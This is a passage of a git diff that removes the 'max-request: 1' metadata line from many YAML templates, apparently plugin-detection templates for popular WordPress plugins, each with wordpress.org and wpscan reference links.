     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
